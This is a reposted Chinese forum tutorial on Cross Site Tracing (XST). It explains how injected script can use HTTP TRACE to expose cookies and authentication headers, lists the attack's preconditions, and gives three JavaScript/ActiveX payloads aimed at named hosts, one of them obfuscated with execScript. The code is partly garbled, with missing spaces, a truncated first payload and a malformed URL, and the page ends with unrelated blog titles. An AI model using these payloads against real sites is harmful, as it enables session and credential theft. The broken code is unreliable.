Cross Site Tracing (XST) Attacks
来源:互联网 发布:共享单车大数据 编辑:程序博客网 时间:2024/05/22 13:36
转载自:http://forum.eviloctal.com/thread-12959-1-1.html
XST攻击属于XSS攻击的一种。
XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及htlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。
XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方;
3、目标站点存在跨域漏洞。
XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证
如何利用:
手法1:
<!--
function
var
xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</script>
<INPUT
手法2:
<scripttype="text/javascript">
<!--
functionxssTRACE() {
varopenWin=open("blank.htm","swords","width=500,height=400");
varotraceswords=openWin.external;
openWin.location.href="http://wmjie.51.net/swords/";
setTimeout(
function() {
//以下必须写在一行
otraceswords.NavigateAndFind
(’javascript:xmlHttp=new
ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;alert("不用documents.cookie
显示站点wmjie.51.net/swords/的头信息。\\n" + xmlDoc);’,"","");
},
1024
);
}
//-->
</script>
<INPUTTYPE=BUTTON onClick="xssTRACE();" VALUE=’XSS TRACE’>
手法3:
<scripttype="text/javascript">
functionxssTRACE(){
varswords="var xmlHttp =new ActiveXObject(\"Microsoft.XMLHTTP\")\;
xmlHttp.open(\"TRACE\",\"http://http://www.tingh.com/\",false)\;
xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;";
vartarget = "http://wmjie.51.net/swords/";
spinach= encodeURIComponent(swords + ’;top.close()’);
varreadyCode = ’font-size:
expression_r(execScript(decodeURIComponent("’+ spinach + ’")))’;
showModalDialog(target,null, readyCode);
}
</script>
<INPUTTYPE=BUTTON onClick="xssTRACE()" VALUE=’XSS TRACE’>
- Cross Site Tracing (XST) Attacks
- cross-site tracing XST攻击
- WebGoat学习笔记(六)——Cross Site Tracing(XST) Attacks
- Cross Site Tracing (XST) Attacks(跨站跟踪攻击)练习详细步骤(WebGoat5.4)
- Preventing Cross-site Scripting Attacks
- XSS Attack Examples (Cross-Site Scripting Attacks)
- Cross Site Port Attacks - XSPA - Part 2
- Protect Against Cross Site Scripting (XSS) Attacks
- (转载)Detection of SQL Injection and Cross-site Scripting Attacks
- Preventing Cross-site Scripting Attacks--In Your Web Applications
- Cross Site Scripting Attacks: Xss Exploits and Defense
- Detection of SQL Injection and Cross-site Scripting Attacks
- Avoiding Cross-Site Scripting (XSS) Attacks With AntiXSS in MVC 4
- Cross site script
- cross site scripting attack
- Anti-Cross Site Scripting
- Cross-site Scripting (XSS)
- Cross-site Scripting (XSS)
- 用sed清除文本的空行和行首空格
- 传统 以太网 时隙(slot time) 理解
- URI/URL/URN
- IOS学习笔记18—UIImageView
- 有向图强连通分量之tarjan算法
- Cross Site Tracing (XST) Attacks
- 微小说 小感动
- 多图赏析日本人组装的iPhone 5!是你期待的吗?
- vim 相关使用
- poj1789 Truck History(Prim算法实现)
- ConcurrentHashMap
- Parameters:Invalid chunk ignored
- Ajax基础实例
- 关于HSV颜色空间